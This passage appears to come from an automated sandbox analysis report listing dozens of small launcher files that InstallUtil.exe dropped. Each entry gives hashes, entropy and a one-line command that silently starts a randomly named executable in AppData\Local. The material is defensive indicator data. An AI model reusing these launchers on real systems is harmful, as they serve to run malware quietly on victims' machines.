                                                                                                                          SHA-512:58FC6005400C6DE2B947B74A2151EFE0C40798ED1E7EBD81146EF9377517E484DDC8E1538B301AD5F199A7FAAAF1543A04277B3F370ED90A6BFA28B83A7BD38D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\57dlvwjpouwRqgMcxEUyyJBM.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.886515610377953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5mKqMp59a2OH4AHF:fE1923mKqaja204m
                                                                                                                          MD5:5E3A6D8A2CC42CCE719418B13AEB6185
                                                                                                                          SHA1:ED726D7586312695975137B54D590FB9E65A1C33
                                                                                                                          SHA-256:C5E4802C6D132CA3EEF4EB68C31A452E144F8718D517F8F7CFC652CA7451C94B
                                                                                                                          SHA-512:6C216125AD129F05F94B4AB4E8053336FA8FC46D868C862CC864FB4220E41CE5979FCF92BB74EDD009BA4C44E003DD8C10AC29DF9A8D29B070DC6EC7F02B06A4
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\CoOFUlBTAxdcXlCbNuzkOL16.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.800801324663667
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5XQXvGH2kOuV9sn:fE1923W8Vu
                                                                                                                          MD5:A46AE994277342C375BED6580A1DCCC0
                                                                                                                          SHA1:58AD3A13B70839813059566077D9C589F910D51C
                                                                                                                          SHA-256:4772E2DC22D2C6E8261237B6763C67CAAFA98EC7925144DF75A961A421A6A0FC
                                                                                                                          SHA-512:09773AE7CB307B9B4130F9EF7F6A9CFAD8C26B94BD66167EBE22A83FE22906432BF9AA59F4EBE651A0E53F3665708FDA8B40462580C6954C600073D141ABA518
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\r5rrZo2uJpDKzb6r7Ao0yzpg.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.938450924997948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5WfdI8K9tDLs0dAHF:fE1923W1XstDo0dm
                                                                                                                          MD5:9D24B7323D346D8BF737F15E3F40F4E7
                                                                                                                          SHA1:0228287220F75D8F562E195A2B4D9AE8A8DD95CC
                                                                                                                          SHA-256:2C35E82F3ECE25A93D78C2F987AFD84583C29FEC63BD1CA8C2D89F40B1399DAD
                                                                                                                          SHA-512:7AAE6C0A535767EB4CE821C4E7A8C17F4E12206E98B01581A166A0919515E33CAD5C67F0CC4691A62AA48DBA7389AB01AA4842DF8F701C210742C6F219CA028C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\szxnVM7joyiHfYU34zqEUXkf.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.891723152900813
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5tzds9FSN3Ro:fE1923BkFSN3Ro
                                                                                                                          MD5:07687FD91A7ABE43B9812771D4BE295E
                                                                                                                          SHA1:BDCBA0EA1B856C4836913710AABC10B8F461512F
                                                                                                                          SHA-256:4CB3E66C2E838CE55A10F01B23FEE31C28E20059689C79F29F06C10CBDC50AC1
                                                                                                                          SHA-512:CCE9289B02611285D0F55D2ED6056D52B41ADD87D714061EBC24E404011F87315952747E47E2DBCB3FAF0AAFE9AFDB026F19CD9F9AAF3ACD34125B28A2659A1C
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):91
                                                                                                                          Entropy (8bit):5.063200003864618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5cxJ13SV4yykdan:fE1923cxJg4yyD
                                                                                                                          MD5:6C444187B3EB0517AA0F9F97441205DF
                                                                                                                          SHA1:63E264B0DE2477AD52F4518291D16E079B2EFCB6
                                                                                                                          SHA-256:7ADBDCE54AA2A629ECF21B0E046493D9DDBB378B0FE18C4891C257A511A030DE
                                                                                                                          SHA-512:4A8C541463FC12FEA45AB12E90D752ADF11CE2B25B5345123D7CE6ADFEACDDC05DA5F897B521823FE2C2B6875528155A8F1665FB95756ABE13879A2EA8CE7CA9
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\9mAmsWjPEPtkITVqz02hZgXo.exe" --silent --allusers=0
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.9258711461231455
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5kpJRlxMVtqyRwLVF:fE1923knRcf+VF
                                                                                                                          MD5:487651BD2C6286F17126D87449BFC960
                                                                                                                          SHA1:8502273AB76B18B535856F544B7F58530C9D5B1F
                                                                                                                          SHA-256:D35ED51809F2F1992548DB8F5F9276FE3BD6CF61D9016DE4F162894445BA3003
                                                                                                                          SHA-512:62895FAB84FE8F2C2E2E0C60A2640B732A45680952A64137EA728A1822AB40B3D62155F8C28DE535371AC46C8645C55BFB3AE0415FE7FBF6B0F3D39C4B180F45
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\ALltRFSkkUvPiwDCHOWNnJTU.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.022369539011194
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5UQkYTn:fE1923UK
                                                                                                                          MD5:C2E2D04CF100A2363B53166ADD7AF9C4
                                                                                                                          SHA1:3CDF9506940E5E5EB0B51F80777007FC8D9DBC29
                                                                                                                          SHA-256:838EE71F44D4B8D86B5EC3E37E3111325C5BF846A37339CF83657D17335F8697
                                                                                                                          SHA-512:2913655B2FAFD211AA492909CEAE86C11154A48E7EAE44024CDE4786CF52F8944D14BE512D08A10FB2E742CFBFC0B347B984F8B8BEDD9F42785C5ED098A29CB6
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\134QwGZJHw0tmuZYxwi52Diq.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.807804538887568
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Akyva0EF:fE1923AkyvaL
                                                                                                                          MD5:8A8E06E098735B6CBCB1FA2B29B5FD97
                                                                                                                          SHA1:49E04B916DEA2D49494A27F4B161DD337D443E15
                                                                                                                          SHA-256:5002C3E3219E3FB55805D1E316793CCCFFE9E830D28341123BB13CC924F5C36E
                                                                                                                          SHA-512:D6DE2AB7F9BD91A6EF242F79EC575697FE271C1449186E6BE4DAD60DA3C2B86C9D11636895A9C996BCF3820197897F658CD34DA1C384CD017F0A2B96E0FA52B5
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\e2LzwnlrYlvQTlkymiNs4ls8.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.886515610377953
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5I8vP2sgh8Fv:fE1923II1l
                                                                                                                          MD5:6F97505B94A3D0072E771D7DB3CB4E82
                                                                                                                          SHA1:7A8FB4906357C6FCD348A4471E6274E684060014
                                                                                                                          SHA-256:2D7A94EE232AD6B423A5C483AEEFFB1E11223568322FDEAAF7D57C2489CDE85B
                                                                                                                          SHA-512:5EABEEF2AB8F305779D1B3E1E4AB007B4E7A720B6595771E5677BE6E10D73E5B499DA5BE93E5093EC7508A23115508D2370475E2ACAB046E2C54165DB8D4D60F
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\meewdacxdZVSIEbNRUL5vYdZ.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.77080324651924
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5OHZhEINLAs:fE1923O/EsLAs
                                                                                                                          MD5:6F39635B7E4CA780A4B15F5D90C2D371
                                                                                                                          SHA1:5FC83CFB98A9BC23097DBA772DA21F56E9138666
                                                                                                                          SHA-256:A58976465D8F25BC2FD6C54DEC76669232D3FA507434070BC053E1B5D1AA255D
                                                                                                                          SHA-512:305EFC4F2682F2E369BC1EC3CEB63822D6B0B541E5EFCBFA771A22EB08F7BA858F1F59445D83EEF2CB7A9A3C2E7DAD2BDEF0CCC9615CB424FE413F325B0828AC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\kbc9DF565eKnpzDzd5tpGZeU.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.864947396030424
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5dTbGap0s:fE1923RbGaas
                                                                                                                          MD5:D523F761AD3BB415A4268AF478B665C3
                                                                                                                          SHA1:8BBF30C26C9FBC4CB5889D69178856ECA10FC5D5
                                                                                                                          SHA-256:11D7FBF80BF685FFF52C4789D578A059B7F76FEA1616B55DDEA3EE846A0A601F
                                                                                                                          SHA-512:E6B20A05FA72CABF7F3DBA23C239DE76E9555A66BD5406EFDCDDFC209B3965F3F525665B0CCDDBA7A8242501903A200F3955B5366A40A61E16A0043223B9C51A
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.040156860408859
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5S2yTZsyeLAs:fE1923S2jyeLAs
                                                                                                                          MD5:E4B876164466B765BBA788A5EE730060
                                                                                                                          SHA1:5F2E3DEC346B5CBC6D1874508EBA1778906CFD09
                                                                                                                          SHA-256:A9DA72C2F0DF3CEB6760FC760D5806CFBA0AE08BB120CC6FF2901B95312B5302
                                                                                                                          SHA-512:501D62BCFCAABA26747CE599157B97244DB9748CA75E369610DDCCC7AE31A0895E78124CC6B1C8281A87CEC097E4BDC429295502949C69D5DCBFA9746D3FB0FE
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\7Kp576NDAvTzMJEKhm2Q0W0Q.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.851309989710665
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5ifMSS2bust:fE1923i0S4st
                                                                                                                          MD5:81ECD3B635A408FF1972CCA425B87564
                                                                                                                          SHA1:04D72DF997D251D2754B86052C52CA0944F820C6
                                                                                                                          SHA-256:86BB4DF5267BB80EAD7D30CA8129A6E56CC228D55FF1EEC221A75DBC66235E12
                                                                                                                          SHA-512:67F1E87A4E7FA73D0F8960757FD7A92B6D9D44950F3422C58D4FD2C400F3D5637E8657A6AAD98B1C20F0D32BF821BE8CD614BEFB26A78AB39DCA39B94D183CDC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\GzFms1Le87SMGeCC7Il4yqA4.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.085088960804955
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5C0fvUH1LNl:fE1923CAsVLv
                                                                                                                          MD5:2EB73E00653E0D1B8C16062094599485
                                                                                                                          SHA1:D1AC0322ED10CFE18545DDD9A015EF91503EE8AD
                                                                                                                          SHA-256:386093800A41B8AF2FF2AACD546130B81AE8061D274910EE3B3C0781E32549DE
                                                                                                                          SHA-512:1D0AAA9CAF3166EA80DEDDAAC5ECD7FF5ED52C53CF5E644EFB25FA84900CEB2A0E290BE7928D564AA8679ED8FE526DF8F56A9D1B6DB1E2B70D9407356ED547CC
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\gVtsjBmwbG1RqNOK7dMp2zOk.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.84536440293172
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5WQV+eENVkiFn:fE1923WQV+eIp
                                                                                                                          MD5:2B325414018A55E1CF55B135D07C100F
                                                                                                                          SHA1:934AEE58E05C6D677095C8D1334F5B528BA0B091
                                                                                                                          SHA-256:30B5FFA9862224653F680C5E1650364C5932E8BB32F81054F82A20B624DD3D1C
                                                                                                                          SHA-512:C9ADA517CEE01B235D400F225D29939CF2D14A115AFCEA7BDA584ACBD8679E19C8BEBD3869F51792DA6F0101AC2D0C4BD2CA958D5F85F79CE218367D8BE5513D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\3uFEiJxNvXDLSx4uJaa7wat0.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.810158782264433
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5Qnpq529z7:fE1923Qpq5217
                                                                                                                          MD5:6447BA778FE493B70B825111CD293E58
                                                                                                                          SHA1:6F7FE0C9473400DF8E7C055BDCD03521F2CAFA62
                                                                                                                          SHA-256:DADA9A282CE1881749960765EFF13D59532AE1B3AB0B1AB5392049B16463F98A
                                                                                                                          SHA-512:9E8E04BC0742B68B462460922E99A1055E3DD0553B8B4C247276A8FAA29C02D8AFF6D042EB6D1772D08034E0557F568AFA4DCB969C72B01362288D4919B99EC8
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\uBxBptf5NobXMRbp9XweSTtU.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):5.050940967582624
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CBMx1IoKlNHF:fE1923C6x1I7F
                                                                                                                          MD5:C033CFEE43E546FA0C3C36FD76858121
                                                                                                                          SHA1:FCE0C334B9143C24CC3F1E21249E609C9C64D44E
                                                                                                                          SHA-256:B6B771C95A1A6A8A707118C979AC4E78215770B63A44FF397034DCFEBC7035F6
                                                                                                                          SHA-512:948EF9BB396438C5CF63484F4DF257B3446CDEBAB2C01BAB0A65AEB27F02852A4D959B7FA0FC4BA3B53842FF4E0EE3E03A76BF8F2C251AF69E0203EC10202E3D
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\g2LMCi9zXGxk0I4KoquGjNoW.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.904302931775618
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J518kPQXfWoQl:fE1923DPQP2
                                                                                                                          MD5:2BD362EDFC4FE70FB80422BF3310218B
                                                                                                                          SHA1:2AE58FCE39D7ED49C0CD3F704A5EDE098A13D8AE
                                                                                                                          SHA-256:49D1EE07232AA6385D0BF7295E87C27A178E55BD7C847592951D5528D265CA52
                                                                                                                          SHA-512:CDCBAF0958A448FE0D42D18780D2DFB8DB08A6AE19E6F86EF9AAA84DF27AD2F4F1630F8FB264A399D29793716BE27F2E85A5240F2AF92409DEEBFC8FD3771B59
                                                                                                                          Malicious:true
                                                                                                                          Preview:start "" "C:\Users\user\AppData\Local\PYAjuaDlqLKzTVmA3BsThyOt.exe"
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):70
                                                                                                                          Entropy (8bit):4.927297795696143
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Ljn9m1Ukh4E2J5CEyrQq1YJl:fE1923CEYIl
                                                                                                                          MD5:F59AE5898CBB1B66AC88535B7DA8EA38
                                                                                                                          SHA1:1FAD2410D7F793AC7965E3442404AFB0F88ADB3D
SHA-256:BF178ECD3002EE9864E5440CC9C1700453611FD58AE5004F3EF4169FD98CEC92
SHA-512:71E733B2EFCDF09A799BF18C324DE8EF4107F182AF44A3A08EBB5BD0B30CA6A1F40C3C9B9E50B99355EA8450CB90A929E049C9927DE9BD7454043B87ABF6A724
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\gatqNuidCSGWV0xrVKmzpZfK.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.829372753235094
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5Xq4NTQe:fE1923rNV
MD5:37651A535A2D58B62B8E4A0785A4B14F
SHA1:39FF0423A23ED8778B1042A90F3A07126539C0FF
SHA-256:1EF20BC7CA94049C9888FA0173DEF6D6E4EE8A5C6495E3EF99C043FAD146F944
SHA-512:887C7FD6260787B6246664A4247BD2E701126B5B73F0ABD38AFB52AE1058DAAD769E82F771A1CD25C10D2BE51D185E34951F157B976740DB34A03716C7AD6782
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\rMRbGvsAwIiAMKrvwkPegxs9.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.936655253296908
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5XhdAOCF0s:fE1923xdno0s
MD5:C4ECBAB412B30155F6754391FCD21E4B
SHA1:A694DCD93E47D54F98E8A757DCA904DE8C3CA4DD
SHA-256:F56621B2A738401797BA08636629854B274C0CAA1FDAB3886F09149300F668B5
SHA-512:A19DBA154F2595FDE339C91072C55F70EED10D78781FB7FCBEF226E30D868B434418CAC792831DDF1E8FAB0F7F8C8CECB62B31A57D4190501D14F7F6F0D2B6A3
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\2h93Z8eIGDBBod8joPEiBXPj.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):4.9523902460631595
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5qO0ExIoToUsM2AHFIkdan:fE1923qO0sVTooSD
MD5:1EC00B15A2E696FB23BDDA5C5A18BDA7
SHA1:2FAA7A8B6835AF419F6C88051D67473005C234DF
SHA-256:89271D3F117ABE2DBD2894FD17187B5051AB0BDFF03E40ED1A6413A6A3C32128
SHA-512:233B82A599A0F17F7E3A44A79DED81A1507C278AB6E3073978392EE22521AB2829F9FAE30C489E0D5EA0B674C4558BA62859F44DF2EC3646983B2C17C8C2E486
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\OkQwRZm1uDGIMvmp1IlBrcDl.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):4.940724761801688
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5HdDehXP6AEykdan:fE19239DehfoyD
MD5:CD297C58620DB8813A34C653076A5A33
SHA1:35127C30C819D144EA153752FDC3B75E31C9E5C0
SHA-256:BF74B0189E44135D74A529912B8DD030164920F951ABB8E1C0494585D6F587AB
SHA-512:C6D6178F5636B9ED1A8EDDE2714D10E67910EDA2EB8B06F213ECC5007CC4B0569C9D4A3ECCA082CC1A6EB9ED0910BD1263BD77932EBDC7558D90E4BC592F65EA
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\byobdbFYFRrd9psjQQD2jS1U.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.887942259950951
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J59TgERyN1CDKAs:fE1923xoCDKv
MD5:C3C54BB646A2591B4154B41F7BCC5CD4
SHA1:588066B400622CEFDE453DDE772FA0AC05098502
SHA-256:0B6C8CAE43280F9871F841056A03C680FE062F1E9510EF8C69A99FF65470E5C5
SHA-512:96AF7401CF92184F91CEE6A8B9E4B6AE7D75D13FDAF6218B793143C8E0BFD45E701EF04C84EDD6A2E96E19359C9D17CCACA00B835EE6910ADB0115132B319751
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\XvEaDZrVEGhrm4VFfP27fZuD.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.916513688522379
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5drxXgRKS:fE1923pxw
MD5:14145F7F8FF072B6AA331B5FEFC67DA9
SHA1:D8432666ECF86C8B257CE3C49F1CA36EE4B792A0
SHA-256:5C1071BFA2FA441EDDD43A4C9ECCC6942FE6C18BEE314A5AFDD5B3A458060690
SHA-512:CAE9273CC71C606B636DF36D2556E9D72F72F2B791E7579ECB95284780B408D32AB6AF5B3408C63AF2B6E31D8AF28B65D52B5762395816C508D81D90751B7BE6
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\xNDUKCy2HYhrmC4BtkadguU1.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):5.071495470921359
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5WCpQl96RP+iykdan:fE1923WCpQl96RP+/D
MD5:6AFED331261D10B9311D5B506068B9A6
SHA1:94F7E84CF66BA629B68CEA10847340E00F52FF02
SHA-256:781F6B87F161BEEDD2406656D9F9E0ED91C67AFAA499E782696B521DF927B761
SHA-512:43B442D0346DEAA2CD87E0B64CC19E0CE3502C4B7D97C0C7E34EAED9D847320AB36C724FEB4A22757307FAB38292E81988B48846079C7F2CC0739CDC5034F325
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\sgtzC1bBRzEH97LXPXHm4FVd.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.920663603600285
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5L/8WymD0EFn:fE1923z8fXEF
MD5:ACEF1BA89299ED96EB657A436BA1F19F
SHA1:C0802E1BC098B8CFC7377ADCEB9080F5DDDEF3BD
SHA-256:FA40BF13701AA7C6ECA3E996180B237B90D5C237154280F5A426C18EF01D732F
SHA-512:A4D31BAC727DFFDDF5DB2771AC898B90A380BD2E7426E2C6634B68CCE1C85B5B4D316EEEEA0DC610BB12967998C529BF4524A2E81B1F6448966ECA3E5C6D711D
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\nUwn1YHZ6ZbqJMYsLSEECV7Y.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.993798110439766
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5mUwAz418bvT0dm:fE1923mpYLTL
MD5:B1A198DD295E404C07AEF8C40D5A2026
SHA1:1630200F75670A16F39E02CA8663CBE3C207DD90
SHA-256:A41BD7F60E21D29FEBEBC9536178CB82904C6E7B0CF26C61D2EB65BADB873CD0
SHA-512:4E1277F7377CC855D0E8DE573AAEBDE383F9389229D3CA85290B3846B0AC1196D8964BCCCE470BB74A960D59989790101F14ED477921561EA54F11F944224D37
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):91
Entropy (8bit):4.944554602962091
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5QA2jdXLT+jClIkdan:fE1923QrjdbT+jpD
MD5:5396D7542BFEF0947A2904CAFE63BEA0
SHA1:EB59863F5FF5C62B05AD43BE093DC0A5FEA85565
SHA-256:88C0D466ECA5DA81938D9310DF87D4BBDFBADBF77939BEB5B2A5445686785330
SHA-512:44186C9198E9DFEB007F5535A224F3A6518D8B7D8429A07F0890B5A0153E0BD95292772184348475A9A9EA441B849114588CAAE9B10675EEBC00D084228CB81B
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\uu6kK0oC1Fx2nv3ruwv5SpiV.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.925871146123144
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J591hgYIxGmy/9t:fE1923XhpIAL
MD5:E221D4A352D5ED4CD72490846FFE738B
SHA1:17B0100B4722FB74D86072CD9C46409887CDCF8D
SHA-256:7EDADADBC3EF31FCCB66D0B1145C8EFD19059367C14D984266969555CEA69A77
SHA-512:F9F060C0BC0539F2BE7BE3B653928E80065CCBC9D7F4FEE8E1EDB33B3938B32A2A6D56FFF152322921557CEA3ECAAA85B1AE4FA2A18B4FD8E4E5601ECB9689DB
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\XPVSCvEdYfmDBcCxUZISEmv8.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.607206767745191
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5LdGF9fAvL:fE1923xGHovL
MD5:256D1C36A9B1B89FA8AAC10B37F9AE22
SHA1:EF85FF258A94F5063DACDF6C55D9CFCAB1567F18
SHA-256:4A132612B00BAE15F1A4EB3DB461C1818F0B8FBF9877431FAFB991E9B6A913F7
SHA-512:F73CBD305B15EDC1AD8F888CC3099DCDAE3479F418D42065D7ABA78603F2AF675869572F45FC052458F01DADB514A8DDB091600A5C68DDB1CDD4969251E6E682
Malicious:true
Preview:start "" "C:\Users\user\AppData\Local\nUeK1cEoa1XzerepeCLGgwoc.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
